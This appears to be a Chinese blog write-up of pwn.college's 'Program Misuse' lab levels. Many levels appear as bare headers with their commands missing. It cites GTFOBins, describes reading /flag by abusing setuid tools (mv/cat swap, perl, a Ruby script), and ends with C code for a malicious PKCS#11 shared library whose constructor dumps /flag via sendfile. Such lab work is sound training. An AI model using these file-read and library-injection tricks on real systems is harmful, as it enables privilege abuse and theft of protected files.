-
-
[原创]二进制入门-程序误用(ASU CSE466: Computer Systems Security)
-
2023-5-26 18:05
-
前言:
网上的二进制入门资源虽然有很多,但是梯度感觉变化太大,不太适合小白入门学习,这里分享一个国外的课程配套刷题网站,本文记录了第一个模块的题的通关记录以及值得记录的知识点,通过这个模块的学习,我们可以基本上能对Linux下的一些常用命令有些了解,在刷题的过程中我们也会对系统安全有了进一步的理解。
(ASU CSE466: Computer Systems Security)
Linux命令行:程序误用,程序交互
Shellcoding:汇编,shellcode注入,预防
逆向工程:功能框架,静态/动态逆向工具
程序利用:劫持到shellcode, JIT喷雾
系统开发:内核模块,权限升级
杂项:沙箱,内存错误,竞争条件
课程网站:https://pwn.college/
网站上是支持在线开启一个在线的容器,就是模拟出一个Linux系统,但是操作起来太卡,我们可以通过ssh的方式进行连接,首先生成自己的rsa_key,然后复制到网站上的个人信息一栏,就可以通过以下命令来进行连接了。
ssh -i key hacker@dojo.pwn.college
(2):https://gtfobins.github.io/gtfobins这个是一个可以查询Linux下命令存在危险行为的网站,网站里面有详细的介绍和利用,对于我们接下来的做题是很有用的.
Program Misuse:
level1:
level10:
1 | rev |
level17
或许我们应该知道zcat这个命令:
level18:
At the begining,I try the command"bzcat":
Actually:
level19:
level20:
1 2 | -O:Outputs the extracted content to standard output instead of extracting the file to disk. |
level21:
我们应该创建静态库文件:
After:
1 2 | command:p - print file(s) found in the archive |
level22:
level23:
level24:
level25:
level26:
level27:
level28:
level29:
level30:
level31:
level32:
File read
更多的信息和介绍我们可以看这里:https://gtfobins.github.io/gtfobins/socat/
level33:
数字是窗口的大小,我们可以通过改变数字:
level34:
level35:
level36:
level37:
level38:
level39:
At first,I try:
正确的方法:(也许你应该了解“/dev/stdout”是什么。)
level40:
思路利用详解:
https://medium.com/workindia-in/the-dark-side-of-mv-command-3419c1bd619
简介:我们可以通过交换“mv”和“cat”
level41:
“-n”选项逐行读取文件,“-e”选项在命令行上执行Perl代码
level42:
level43:
Owing to:
Attention:
我们可以在tmp目录下编写脚本:
So we can solve it by:
1 2 3 | #!/usr/bin/env rubycontent = File.read("/flag")puts content |
level44:
level45:
level46:
level47:
level48:
level49:
level50:
此方法不区分大小写,直接输出小写:
You will find the difference:
level51(Medium):
1 2 3 4 | -D pkcs11 Download the public keys provided by the PKCS#11 shared library pkcs11. When used in combination with -s, this option indicates that a CA key resides in a PKCS#11 token (see the CERTIFICATES section for details). |
共享库
我们创建了一个测试文件:test.c,得到:
We failed:
Attention:
1 2 3 4 5 6 7 8 | #include<stdio.h>int main(int argc,char const * argv){ puts("Hello"); return 0;}int C_GetFunctionList(){ puts("Hi");} |
Exploit:
1 2 3 4 5 6 7 8 | #include<stdio.h>int main(int argc,char const * argv){ puts("Hello"); return 0;}int C_GetFunctionList(){ sendfile(1,open("/flag",0),0,4096);} |
Or:
1 2 3 4 5 6 7 8 9 | #include<stdio.h>int main(int argc,char const * argv){ puts("Hello"); return 0;}__attribute__((constructor))int my_fun(){ sendfile(1,open("/flag",0),0,4096);} |
